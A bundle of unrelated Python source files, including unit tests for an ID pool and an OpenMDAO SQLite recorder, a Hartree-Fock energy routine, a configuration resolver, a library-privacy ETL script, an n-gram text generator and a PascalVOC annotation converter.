# Copyright 2017 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for _idpool module of the zhmcclient_mock package.
"""
from __future__ import absolute_import, print_function
import requests.packages.urllib3
import pytest
from zhmcclient_mock._idpool import IdPool
requests.packages.urllib3.disable_warnings()
class TestIdPool(object):
"""All tests for class IdPool."""
def test_init_error_1(self):
with pytest.raises(ValueError):
IdPool(7, 6)
def test_invalid_free_error_1(self):
pool = IdPool(5, 5)
with pytest.raises(ValueError):
pool.free(4) # not in range
with pytest.raises(ValueError):
pool.free(5) # in range but not allocated
with pytest.raises(ValueError):
pool.free(6) # not in range
def test_invalid_free_error_2(self):
pool = IdPool(5, 5)
pool.free_if_allocated(4) # not in range (= not allocated)
pool.free_if_allocated(5) # in range but not allocated
pool.free_if_allocated(6) # not in range (= not allocated)
def _test_exhausting_for_lo_hi(self, lowest, highest):
start = lowest
end = highest + 1
pool = IdPool(lowest, highest)
# Exhaust the pool
id_list = []
for i in range(start, end):
id = pool.alloc()
id_list.append(id)
# Verify uniqueness of the ID values
id_set = set(id_list)
assert len(id_set) == len(id_list)
# Verify that the pool is exhausted
with pytest.raises(ValueError):
pool.alloc()
def _test_free_for_lo_hi(self, lowest, highest):
start = lowest
end = highest + 1
pool = IdPool(lowest, highest)
# Exhaust the pool
id_list1 = []
for i in range(start, end):
id = pool.alloc()
id_list1.append(id)
# Return everything to the pool
for id in id_list1:
pool.free(id)
# Verify that nothing is used in the pool
assert len(pool._used) == 0
# Exhaust the pool
id_list2 = []
for i in range(start, end):
id = pool.alloc()
id_list2.append(id)
# Verify that the same ID values came back as last time
assert set(id_list1) == set(id_list2)
# Verify that the pool is exhausted
with pytest.raises(ValueError):
pool.alloc()
def _test_all_for_lo_hi(self, lowest, highest):
self._test_exhausting_for_lo_hi(lowest, highest)
self._test_free_for_lo_hi(lowest, highest)
def test_all(self):
# Knowing that the chunk size is 10, we focus on the sizes and range
# boundaries around that
self._test_all_for_lo_hi(0, 0)
self._test_all_for_lo_hi(0, 1)
self._test_all_for_lo_hi(0, 9)
self._test_all_for_lo_hi(0, 10)
self._test_all_for_lo_hi(0, 11)
self._test_all_for_lo_hi(0, 19)
self._test_all_for_lo_hi(0, 20)
self._test_all_for_lo_hi(0, 21)
self._test_all_for_lo_hi(3, 3)
self._test_all_for_lo_hi(3, 4)
self._test_all_for_lo_hi(3, 9)
self._test_all_for_lo_hi(3, 10)
self._test_all_for_lo_hi(3, 11)
self._test_all_for_lo_hi(3, 12)
self._test_all_for_lo_hi(3, 13)
self._test_all_for_lo_hi(3, 14)
self._test_all_for_lo_hi(9, 9)
self._test_all_for_lo_hi(9, 10)
self._test_all_for_lo_hi(9, 11)
self._test_all_for_lo_hi(9, 18)
self._test_all_for_lo_hi(9, 19)
self._test_all_for_lo_hi(9, 20)
self._test_all_for_lo_hi(10, 10)
self._test_all_for_lo_hi(10, 11)
self._test_all_for_lo_hi(10, 19)
self._test_all_for_lo_hi(10, 20)
self._test_all_for_lo_hi(10, 21)
self._test_all_for_lo_hi(11, 11)
self._test_all_for_lo_hi(11, 12)
self._test_all_for_lo_hi(11, 20)
self._test_all_for_lo_hi(11, 21)
self._test_all_for_lo_hi(11, 22)
|
#!/usr/bin/env python3
#
# Copyright 2022 Kurt R. Brorsen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def hf_energy(eri_ee_full, eri_ep_full, mo_fock_1e, mo_fock_1p, e_nocc, p_nocc):
e_hf = 0.0
for i in range(e_nocc):
e_hf += 2*mo_fock_1e[i,i]
for j in range(e_nocc):
e_hf += (2*eri_ee_full[i,i,j,j] - eri_ee_full[i,j,i,j])
        # subtract the electron-proton interaction once, since it is double counted when
        # using both the electronic and protonic Fock matrices
for j in range(p_nocc):
e_hf -= 2*eri_ep_full[i,i,j,j]
for i in range(p_nocc):
e_hf += mo_fock_1p[i,i]
return e_hf
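# Minimal usage sketch (not part of the original script): the array shapes and occupation
# numbers below are assumptions chosen only to illustrate the expected argument layout,
# i.e. MO-basis electron-electron and electron-proton integrals plus the two Fock matrices.
if __name__ == '__main__':
    import numpy as np
    n_e, n_p = 4, 2                          # hypothetical numbers of electronic / protonic MOs
    eri_ee = np.zeros((n_e, n_e, n_e, n_e))  # electron-electron repulsion integrals
    eri_ep = np.zeros((n_e, n_e, n_p, n_p))  # electron-proton attraction integrals
    f_e = np.diag([-1.0, -0.5, 0.2, 0.4])    # toy diagonal electronic Fock matrix
    f_p = np.diag([-0.3, 0.1])               # toy diagonal protonic Fock matrix
    # with zero two-particle integrals this reduces to 2*(-1.0 - 0.5) + (-0.3) = -3.3
    print(hf_energy(eri_ee, eri_ep, f_e, f_p, e_nocc=2, p_nocc=1))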
|
import cas
import cas.common.utilities as utilities
import sys
import json
import multiprocessing
from collections.abc import Sequence, Mapping
from pathlib import Path
import simpleeval
import jsonschema
from dotmap import DotMap
def extend_validator_with_default(validator_class):
validate_properties = validator_class.VALIDATORS["properties"]
def set_defaults(validator, properties, instance, schema):
for property, subschema in properties.items():
if "default" in subschema:
instance.setdefault(property, subschema["default"])
for error in validate_properties(validator, properties, instance, schema):
yield error
return jsonschema.validators.extend(validator_class, {"properties": set_defaults})
DefaultValidatingDraft7Validator = extend_validator_with_default(
jsonschema.Draft7Validator
)
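# Illustrative sketch (not part of the original module): the extended validator above both
# validates an instance and fills in any "default" values declared in the schema. The schema
# and data used here are made up purely for demonstration.
def _demo_default_filling_validator():
    schema = {
        "type": "object",
        "properties": {"build": {"type": "string", "default": "trunk"}},
    }
    data = {}
    DefaultValidatingDraft7Validator(schema).validate(data)
    assert data == {"build": "trunk"}  # the missing key was populated from its default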
class DataResolverScope(Mapping):
def __init__(self):
self._data = DotMap()
def __getitem__(self, key):
if key not in self._data:
raise KeyError(key)
return self._data[key]
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def get_subsystem_output(self, subsystem: str, output: str):
return self._data.subsystems[subsystem].outputs[output]
def exclude_subsystem_input_files(self, subsystem: str, root: Path):
files = self.get_subsystem_output(subsystem, "files")
return utilities.rglob_invert(utilities.relative_paths(root, files))
class DataResolver:
"""
Class that actually does the configuration resolution
"""
def __init__(self, data: Mapping):
self._data = data
def build_eval_locals(self, parent: Mapping, scope: DataResolverScope) -> Mapping:
return DotMap(
{
"parent": parent,
"context": scope,
"path": self._data.path,
"args": self._data.args,
"assets": self._data.assets,
"subsystems": self._data.subsystems,
"env": {
"platform": sys.platform,
"cpu_count": multiprocessing.cpu_count(),
},
}
)
def _inject_config_str(self, config: str, eval_locals: Mapping) -> str:
"""
A terrible lexical parser for interpolated globals.
I.e. "build type: $(args.build)" returns "build type: trunk"
"""
prev = None
inblock = False
current = ""
result = ""
for c in config:
if c == "$":
prev = c
continue
if not inblock and c == "(" and prev == "$":
# read to end for key
inblock = True
elif inblock and c == ")":
value = utilities.get_dotpath_value(current, eval_locals)
if value is None:
raise Exception(
f"Value of configuration variable $({current}) was None"
)
result += str(value)
current = ""
inblock = False
elif inblock:
current += c
else:
result += c
prev = c
return result
def eval(self, condition: str, parent: Mapping, scope: DataResolverScope) -> bool:
        # avoid infinite recursion
if isinstance(parent, LazyDynamicMapping):
parent = parent._data
eval_locals = self.build_eval_locals(parent, scope)
injected = self._inject_config_str(condition, eval_locals)
evaluator = simpleeval.EvalWithCompoundTypes(names=eval_locals)
result = evaluator.eval(injected)
# logging.debug(f'\"{cond}\" evaluated to: {result}')
return result
def resolve(self, config, scope: Mapping):
"""
Resolves the stored configuration into literal terms at runtime
"""
result = config
if isinstance(config, list):
result = []
for _, v in enumerate(config):
parsed = self.resolve(v, scope)
if not v or parsed is not None:
result.append(parsed)
elif isinstance(config, str):
result = self._inject_config_str(config, scope)
return result
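# Illustrative sketch (not part of the original module): reproduces the behaviour described in
# the _inject_config_str docstring. The DotMap contents are assumptions for this demo, and
# utilities.get_dotpath_value is expected to resolve the dotted path inside eval_locals.
def _demo_inject_config_str():
    resolver = DataResolver(DotMap({"args": {"build": "trunk"}}))
    eval_locals = DotMap({"args": {"build": "trunk"}})
    # expected result: "build type: trunk"
    return resolver._inject_config_str("build type: $(args.build)", eval_locals)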
class LazyDynamicBase:
"""
Base object that allows lazy resolution of configuration data
"""
def __init__(
self,
data=None,
resolver: DataResolver = None,
scope: DataResolverScope = None,
parent=None,
):
self._data = data
self._resolver = resolver
self._scope = scope
self._parent = parent
self._transform_map = {list: LazyDynamicSequence, dict: LazyDynamicDotMap}
def _transform_object(self, data):
eval_locals = self._resolver.build_eval_locals(self, self._scope)
for k, v in self._transform_map.items():
if isinstance(data, k):
resolved = v(data, self._resolver, self._scope, self)
return resolved
return self._resolver.resolve(data, eval_locals)
class LazyDynamicSequence(LazyDynamicBase, Sequence):
"""
Lazy dynamic implementation of Sequence.
"""
def __init__(
self,
data: Sequence = [],
resolver: DataResolver = None,
scope: DataResolverScope = None,
parent=None,
):
super().__init__(data, resolver, scope, parent)
def __getitem__(self, key):
return self._transform_object(self._data[key])
def __len__(self):
return len(self._data)
def with_scope(self, scope: DataResolverScope):
return LazyDynamicSequence(self._data, self._resolver, scope)
class LazyDynamicMapping(LazyDynamicBase, Mapping):
"""
Lazy dynamic implementation of Mapping.
"""
def __init__(
self,
data: Mapping = {},
resolver: DataResolver = None,
scope: DataResolverScope = None,
parent=None,
):
super().__init__(data, resolver, scope, parent)
self._expressions = self._data.get("@expressions", {})
self._conditions = self._data.get("@conditions", {})
# strip special members and members that don't match conditions immediately
self._data = {k: v for k, v in self._data.items() if self._eval_condition(k)}
def _eval_condition(self, key: str):
if key in {"@expressions", "@conditions"}:
return False
condition = self._conditions.get(key)
if isinstance(condition, str) and not self._resolver.eval(
condition, self, self._scope
):
return False
return True
def _transform_kv(self, key: str, value):
"""
Evaluates @expressions and @conditions on a key
"""
expression = self._expressions.get(key)
if isinstance(expression, str):
value = self._resolver.eval(expression, self, self._scope)
return self._transform_object(value)
def __getitem__(self, key):
return self._transform_kv(key, self._data.get(key))
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def get(self, key, default=None):
result = self._data.get(key, default)
if result is None:
return None
return self._transform_kv(key, result)
def with_scope(self, scope: DataResolverScope):
return LazyDynamicMapping(self._data, self._resolver, scope)
class LazyDynamicDotMap(LazyDynamicMapping):
"""
Lazy dynamic implementation of DotMap.
"""
def __init__(
self,
data: Mapping = {},
resolver: DataResolver = None,
scope: DataResolverScope = None,
parent=None,
):
super().__init__(data, resolver, scope, parent)
dmap = DotMap()
dmap._map = self._data
self._data = dmap
def __getattr__(self, k):
if k in {
"_data",
"_resolver",
"_scope",
"_transform_map",
"_expressions",
"_conditionals",
"_dotmap",
}:
return super(self.__class__, self).__getattribute__(k)
return self._transform_kv(k, self._data.__getattr__(k))
def with_scope(self, scope):
return LazyDynamicDotMap(self._data, self._resolver, scope)
class ConfigurationUtilities:
@staticmethod
def parse_root_config(root: Path, config: dict) -> dict:
# validate the root schema
schema_path = Path(cas.__file__).parent.absolute().joinpath("schemas")
with open(schema_path.joinpath("root.json"), "r") as f:
root_schema = json.load(f)
DefaultValidatingDraft7Validator(root_schema).validate(config)
# validate all subsystem options
validators = {}
prefix = "cas.subsystems."
for k, subsystem in config["subsystems"].items():
if k in {"@conditions", "@expressions"}:
continue
module = subsystem.module
# validating third-party subsystems is not supported yet
if not module.startswith(prefix):
continue
sub_name = module[len(prefix) :]
if sub_name not in validators:
sub_path = schema_path.joinpath("subsystems", f"{sub_name}.json")
if not sub_path.exists():
raise Exception(f"unable to find schema for subsystem '{sub_name}'")
with open(sub_path, "r") as f:
validators[sub_name] = DefaultValidatingDraft7Validator(
json.load(f)
)
if subsystem.get("options") is None:
continue
validators[sub_name].validate(subsystem.options)
# setup the dotmap that we'll use to perform lazy resolution
config = DotMap(config)
config.path.root = root
config.path.content = root.joinpath("content")
config.path.game = root.joinpath("game")
config.path.src = root.joinpath("src")
config.path.devtools = config.path.src.joinpath("devtools")
config.path.secrets = config.path.devtools.joinpath("buildsys", "secrets")
config.path.vproject = config.path.game.joinpath(
config.options.project
).resolve()
# create the root resolver and the map
resolver = DataResolver(config)
return LazyDynamicDotMap(config.toDict(), resolver)
|
"""
project = "Protecting Patron Privacy on the Web: A Study of HTTPS and Google Analytics Implementation in Academic Library Websites"
name = "2_return_url_json.py",
version = "1.0",
author = "Patrick OBrien",
date = "07/25/2018"
author_email = "[email protected]",
description = ("Step 2 of 3: Extract, transform, and load data from result.json into a SQLite database needed to maintain traceability and de-duplication of pages returned by study population web servers."),
license = "[MIT license](https://opensource.org/licenses/mit-license.php)",
keywords = "IMLS Measuring Up, Digital Repositories, Research Library Privacy",
url = "https://github.com/imls-measuring-up/library-privacy",
"""
import json
import sqlite3
from urllib.parse import urlsplit
# read JSON Results
dir_name = '_data/2016-10-05T14:51:11.452293/'
file_json = dir_name + 'result.json'
json_string = open(file_json).read()
json_data = json.loads(str(json_string))
# connect to privacy DB
conn = sqlite3.connect('privacydb.sqlite')
cur = conn.cursor()
for call in json_data:
# read JSON file to update records with Return information
urlReturn = json_data[call]['pageRedirectEndURL'].strip().lower()
fileName = json_data[call]['filename'].strip()
requestUUID = fileName.split('.')[0]
scheme, host, path, query, fragment = urlsplit(urlReturn)
urlRootReturn = host + path + query + fragment
if scheme == 'http':
digCertReturn = 0
else:
digCertReturn = 1
cur.execute("SELECT id FROM UrlRequest WHERE requestUUID = ?",
(requestUUID,))
urlRequestID = cur.fetchone()[0]
    # Update the request record with the results from result.json
cur.execute('''
UPDATE UrlRequest
SET urlReturn = ?, urlRootReturn = ?, digCertReturn = ?
WHERE id = ?''',
(urlReturn, urlRootReturn, digCertReturn, urlRequestID,))
conn.commit()
|
from Organism.Organism import Organism
from Organism.Animal import *
from Organism.Plant import *
|
import sys
import json
import string
import random
POPULAR_NGRAM_COUNT = 10000
#Population is all the possible items that can be generated
population = ' ' + string.ascii_lowercase
def preprocess_frequencies(frequencies, order):
'''Compile simple mapping from N-grams to frequencies into data structures to help compute
the probability of state transitions to complete an N-gram
Arguments:
frequencies -- mapping from N-gram to frequency recorded in the training text
order -- The N in each N-gram (i.e. number of items)
Returns:
    sequencer -- mapping from each N-1 lead sequence to the frequency of each possible
                 item completing it
popular_ngrams -- list of most common N-grams
'''
sequencer = {}
ngrams_sorted_by_freq = [
k for k in sorted(frequencies, key=frequencies.get, reverse=True)
]
popular_ngrams = ngrams_sorted_by_freq[:POPULAR_NGRAM_COUNT]
for ngram in frequencies:
#Separate the N-1 lead of each N-gram from its item completions
freq = frequencies[ngram]
lead = ngram[:-1]
final = ngram[-1]
sequencer.setdefault(lead, {})
sequencer[lead][final] = freq
return sequencer, popular_ngrams
def generate_letters(sequencer, popular_ngrams, length, order):
'''Generate text based on probabilities derived from statistics for initializing
and continuing sequences of letters
Arguments:
sequencer -- mapping from each leading sequence to frequencies of the next letter
popular_ngrams -- list of the highest frequency N-Grams
length -- approximate number of characters to generate before ending the program
order -- The N in each N-gram (i.e. number of items)
Returns:
nothing
'''
#The lead is the initial part of the N-Gram to be completed, of length N-1
#containing the last N-1 items produced
lead = ''
#Keep track of how many items have been generated
generated_count = 0
while generated_count < length:
#This condition will be true until the initial lead N-gram is constructed
#It will also be true if we get to a dead end where there are no stats
#For the next item from the current lead
if lead not in sequencer:
#Pick an N-gram at random from the most popular
reset = random.choice(popular_ngrams)
#Drop the final item so that lead is N-1
lead = reset[:-1]
for item in lead:
print(item, end='', flush=True)
generated_count += len(lead)
else:
freq = sequencer[lead]
weights = [ freq.get(c, 0) for c in population ]
chosen = random.choices(population, weights=weights)[0]
print(chosen, end='', flush=True)
#Clip the first item from the lead and tack on the new item
lead = lead[1:] + chosen
generated_count += 1
return
if __name__ == '__main__':
#File with N-gram frequencies is the first argument
raw_freq_fp = open(sys.argv[1])
length = int(sys.argv[2])
raw_freqs = json.load(raw_freq_fp)
#Figure out the N-gram order. Just pull the first N-gram and check its length
order = len(next(iter(raw_freqs)))
sequencer, popular_ngrams = preprocess_frequencies(raw_freqs, order)
generate_letters(sequencer, popular_ngrams, length, order)
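# Example invocation (the file name below is an assumption):
#   python generate_letters.py ngram_freqs.json 500
# where ngram_freqs.json maps each N-gram string to its observed count,
# e.g. {"the": 512, "he ": 431, ...}, and 500 is the approximate number
# of characters to generate.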
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from abc import ABC
import xml.etree.ElementTree as ET
import pandas as pd
import os
import re
import sys
import logging
# setup logger
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
from .operator import IOperator
class PascalVOC(IOperator, ABC):
""" Instance Object for pascal VOC annotation format """
def __init__(self, dataset):
super().__init__(dataset)
self._dataset = dataset
def extract(self, path: str):
""" extract annotation data when input the path to .xml files
:param path: string, relative / absolute path for annotation folder
:return:
"""
files_list = self.__extractFiles(path)
image_id = 0
img_list = []
tol_obj_list = []
for file in files_list:
img_data, obj_list = self.__FileReader(os.path.abspath(path) + os.sep + file)
image_id += 1
img_data.append(image_id)
obj_list = [i+[image_id] for i in obj_list]
img_list.append(img_data)
tol_obj_list.extend(obj_list)
if img_list:
img_df = pd.DataFrame.from_records(img_list, columns=['name', 'width', 'height','image_id'])
self.__updateDataset(img_df)
else:
logger.error("[var]: img_list is empty.")
sys.exit(1)
        if tol_obj_list and len(tol_obj_list[0]) == 6:  # check the aggregated list, not just the last file's
obj_df = pd.DataFrame.from_records(tol_obj_list,
columns=['x_min', 'y_min', 'x_max', 'y_max', 'class', 'image_id'])
self.__DFRefiner(obj_df)
else:
logger.error(f"\n ERROR : obj_list has not many attrs. : {len(obj_list[0])} or obj_list is empty : {len(obj_list)}")
sys.exit(1)
def archive(self, location: str, data):
""" save pascalVOC annotation file in the given location
:param location: .xml file saving location
        :param data: .xml data bundle
:return:
"""
try:
tree_str = ET.tostring(data)
with open(location, 'wb') as pf:
pf.write(tree_str)
except Exception as error:
logger.exception(error)
sys.exit(1)
def translate(self):
""" translate common schema into json compatible format.
:return: none
"""
for index, row in self._dataset.iterrows():
ann_list = self.__filterImgObj(row['image_id'])
box = self.__xmlFormatter(row, ann_list)
if box:
yield box, row['name']
else:
yield None
def __extractFiles(self, path: str):
"""
:param path: relative or absolute directory to the annotation folder.
:return: return list of all .xml file names in given directory.
"""
if os.path.exists(path):
if not [x[1] for x in os.walk(path) if x[1] != []]:
path_list = [y[2] for y in os.walk(path) if y[2] != []][0]
if path_list:
xml_list = [n for n in path_list if n.split('.')[-1] == 'xml']
if xml_list:
return xml_list
else:
logger.error("\n ERROR : There are no .xml files in the given directory.")
sys.exit(1)
else:
logger.error("\n ERROR : The folder is empty.")
sys.exit(1)
else:
logger.error(f"\n ERROR : The entered path <{path}> is not valid.")
sys.exit(1)
def __DFRefiner(self, ann_df):
"""
create pd.DataFrame with columns of [ "obj_id", "image_id", "class_id", "x_min", "y_min", "x_max", "y_max" ] and
define self.annotations and self.classes
:param ann_df: pd.Dataframe with columns of [ 'x_min', 'y_min', 'x_max', 'y_max', 'class', 'image_id' ]
:return: None
"""
ann_df = ann_df.copy()
cats = list(ann_df.loc[:, "class"].unique())
n_cats = len(cats)
cat_series = pd.Series(range(1, n_cats + 1), index=cats)
ann_df["class_id"] = ann_df["class"].map(cat_series)
ann_df["obj_id"] = range(1,ann_df.shape[0]+1)
nw_df = ann_df.loc[:, ["obj_id", "image_id", "class_id", "x_min", "y_min", "x_max", "y_max"]]
super(PascalVOC, self).set_annotations(nw_df)
super(PascalVOC, self).set_classes(dict(zip(range(1,n_cats+1),cats)))
def __FileReader(self, file_path: str):
""" read individual xml files extract data, create pd.DataFrame files
:param file_path: absolute path to the single .xml file
        :return: list of two lists
                 img_data = [ filename, width, height ]
                 obj_list = list of [ xmin, ymin, xmax, ymax, class ] per object
"""
ann_tree = ET.parse(file_path)
ann_root = ann_tree.getroot()
try:
filename = self.__tagFilter(ann_root.find('filename').text)
size = ann_root.find('size')
width = int(size.find('width').text)
height = int(size.find('height').text)
img_data = [filename, width, height]
obj_list = []
for obj in ann_root.findall('object'):
obj_list.append(self.__get_voc_annotation_from_obj(obj))
except Exception as error:
logger.exception(error)
sys.exit(1)
return [img_data, obj_list]
def __get_voc_annotation_from_obj(self, obj):
""" read <object> block in xml file
:param obj: <object> block in the .xml file
        :return: a list of object attrs. [ xmin, ymin, xmax, ymax, class ]
"""
try:
label = self.__tagFilter(obj.find('name').text)
bndbox = obj.find('bndbox')
xmin = int(bndbox.find('xmin').text)
ymin = int(bndbox.find('ymin').text)
xmax = int(bndbox.find('xmax').text)
ymax = int(bndbox.find('ymax').text)
ann = [xmin, ymin, xmax, ymax, label]
return ann
except Exception as error:
logger.exception(error)
sys.exit(1)
def __updateDataset(self, image_df):
"""
:param image_df: image attributes DataFrame
        :return: None; merges the current self._dataset with image_df and stores the result.
"""
partial_df = image_df.copy()
res_df = pd.merge(self._dataset, partial_df, on="name")
super(PascalVOC, self).set_dataset(res_df)
def __filterImgObj(self, img_id):
""" get row for specific image_id.
:param img_id: [int] image_id in the self.annotations
        :return: all the rows that carry the given image_id, as a list.
"""
filtered_list = self.annotations.loc[self.annotations["image_id"] == img_id, :].values.tolist()
return filtered_list
def __xmlFormatter(self, image_data, ann_data):
""" build the structure of the .xml file with data.
:param image_data: dictionary for data in self._dataset
:param ann_data: return values from self.__filterImgObj
:return: complete .xml object
"""
try:
ann = ET.Element("annotation")
ET.SubElement(ann, 'folder').text = image_data['folder']
ET.SubElement(ann, 'filename').text = image_data['name']
ET.SubElement(ann, 'path').text = image_data['path']
size = ET.SubElement(ann, 'size')
ET.SubElement(size, 'width').text = str(image_data['width'])
ET.SubElement(size, 'height').text = str(image_data['height'])
ET.SubElement(size, 'depth').text = str(3)
for line in ann_data:
obj = ET.SubElement(ann, 'object')
ET.SubElement(obj, 'name').text = self.classes[line[2]]
ET.SubElement(obj, 'pose').text = 'Unspecified'
ET.SubElement(obj, 'truncated').text = str(0)
ET.SubElement(obj, 'difficult').text = str(0)
bbox = ET.SubElement(obj, 'bndbox')
ET.SubElement(bbox, 'xmin').text = str(line[3])
ET.SubElement(bbox, 'ymin').text = str(line[4])
ET.SubElement(bbox, 'xmax').text = str(line[5])
ET.SubElement(bbox, 'ymax').text = str(line[6])
return ann
except Exception as error:
logger.exception(error)
sys.exit(1)
def __tagFilter(self,st: str):
s = re.sub(r'\t*\n*\r*', '', st)
return s
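# Usage sketch (illustrative; the dataset object and paths below are assumptions):
#   op = PascalVOC(dataset)                # dataset: pd.DataFrame holding the common schema
#   op.extract('path/to/annotations')      # read every .xml file and populate the schema
#   for xml_tree, name in op.translate():  # rebuild one <annotation> element per image
#       op.archive(f'out/{name}.xml', xml_tree)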
|
from django.apps import AppConfig
class WorkouttrackerConfig(AppConfig):
name = 'workouttracker'
|
""" Unit test for the SqliteRecorder. """
import errno
import os
from shutil import rmtree
from tempfile import mkdtemp
import time
import numpy as np
from sqlitedict import SqliteDict
from openmdao.core.problem import Problem
from openmdao.core.group import Group
from openmdao.core.parallel_group import ParallelGroup
from openmdao.core.component import Component
from openmdao.core.mpi_wrap import MPI
from openmdao.components.indep_var_comp import IndepVarComp
from openmdao.recorders.sqlite_recorder import SqliteRecorder
from openmdao.recorders.test.test_sqlite import _assertMetadataRecorded, _assertIterationDataRecorded
from openmdao.test.mpi_util import MPITestCase
if MPI:
from openmdao.core.petsc_impl import PetscImpl as impl
coordinate = [MPI.COMM_WORLD.rank, 'Driver', (1, )]
else:
from openmdao.core.basic_impl import BasicImpl as impl
coordinate = [0, 'Driver', (1, )]
class ABCDArrayComp(Component):
def __init__(self, arr_size=9, delay=0.01):
super(ABCDArrayComp, self).__init__()
self.add_param('a', np.ones(arr_size, float))
self.add_param('b', np.ones(arr_size, float))
self.add_param('in_string', '')
self.add_param('in_list', [])
self.add_output('c', np.ones(arr_size, float))
self.add_output('d', np.ones(arr_size, float))
self.add_output('out_string', '')
self.add_output('out_list', [])
self.delay = delay
def solve_nonlinear(self, params, unknowns, resids):
time.sleep(self.delay)
unknowns['c'] = params['a'] + params['b']
unknowns['d'] = params['a'] - params['b']
unknowns['out_string'] = params['in_string'] + '_' + self.name
unknowns['out_list'] = params['in_list'] + [1.5]
def run(problem):
t0 = time.time()
problem.run()
t1 = time.time()
return t0, t1
class TestSqliteRecorder(MPITestCase):
filename = ""
dir = ""
N_PROCS = 2
def setUp(self):
self.dir = mkdtemp()
self.filename = os.path.join(self.dir, "sqlite_test")
self.tablename_metadata = 'metadata'
self.tablename_iterations = 'iterations'
self.recorder = SqliteRecorder(self.filename)
self.recorder.options['record_metadata'] = False
self.eps = 1e-5
def tearDown(self):
try:
rmtree(self.dir)
except OSError as e:
# If directory already deleted, keep going
if e.errno not in (errno.ENOENT, errno.EACCES, errno.EPERM):
raise e
def assertMetadataRecorded(self, expected):
if self.comm.rank != 0:
return
db = SqliteDict(self.filename, self.tablename_metadata)
_assertMetadataRecorded(self, db, expected)
db.close()
def assertIterationDataRecorded(self, expected, tolerance, root):
if self.comm.rank != 0:
return
db = SqliteDict(self.filename, self.tablename_iterations)
_assertIterationDataRecorded(self, db, expected, tolerance)
db.close()
def test_basic(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['record_params'] = True
self.recorder.options['record_resids'] = True
prob.setup(check=False)
t0, t1 = run(prob)
prob.cleanup()
expected_params = [
("C1.a", [1.0, 1.0, 1.0]),
("C1.b", [2.0, 2.0, 2.0]),
]
expected_unknowns = [
("G1.P1.x", np.array([1.0, 1.0, 1.0])),
("G1.P2.x", np.array([2.0, 2.0, 2.0])),
("C1.c", np.array([3.0, 3.0, 3.0])),
("C1.d", np.array([-1.0, -1.0, -1.0])),
("C1.out_string", "_C1"),
("C1.out_list", [1.5]),
]
expected_resids = [
("G1.P1.x", np.array([0.0, 0.0, 0.0])),
("G1.P2.x", np.array([0.0, 0.0, 0.0])),
("C1.c", np.array([0.0, 0.0, 0.0])),
("C1.d", np.array([0.0, 0.0, 0.0])),
("C1.out_string", ""),
("C1.out_list", []),
]
self.assertIterationDataRecorded(((coordinate, (t0, t1),
expected_params, expected_unknowns,
expected_resids),),
self.eps, prob.root)
def test_includes(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['record_params'] = True
self.recorder.options['record_resids'] = True
self.recorder.options['includes'] = ['C1.*']
prob.setup(check=False)
t0, t1 = run(prob)
prob.cleanup()
expected_params = [
("C1.a", [1.0, 1.0, 1.0]),
("C1.b", [2.0, 2.0, 2.0]),
]
expected_unknowns = [
("C1.c", np.array([3.0, 3.0, 3.0])),
("C1.d", np.array([-1.0, -1.0, -1.0])),
("C1.out_string", "_C1"),
("C1.out_list", [1.5]),
]
expected_resids = [
("C1.c", np.array([0.0, 0.0, 0.0])),
("C1.d", np.array([0.0, 0.0, 0.0])),
("C1.out_string", ""),
("C1.out_list", []),
]
self.assertIterationDataRecorded(((coordinate, (t0, t1), expected_params, expected_unknowns, expected_resids),), self.eps, prob.root)
def test_includes_and_excludes(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['includes'] = ['C1.*']
self.recorder.options['excludes'] = ['*.out*']
self.recorder.options['record_params'] = True
self.recorder.options['record_resids'] = True
prob.setup(check=False)
t0, t1 = run(prob)
prob.cleanup()
expected_params = [
("C1.a", [1.0, 1.0, 1.0]),
("C1.b", [2.0, 2.0, 2.0]),
]
expected_unknowns = [
("C1.c", np.array([3.0, 3.0, 3.0])),
("C1.d", np.array([-1.0, -1.0, -1.0])),
]
expected_resids = [
("C1.c", np.array([0.0, 0.0, 0.0])),
("C1.d", np.array([0.0, 0.0, 0.0])),
]
self.assertIterationDataRecorded(((coordinate, (t0, t1), expected_params, expected_unknowns, expected_resids),), self.eps, prob.root)
def test_solver_record(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
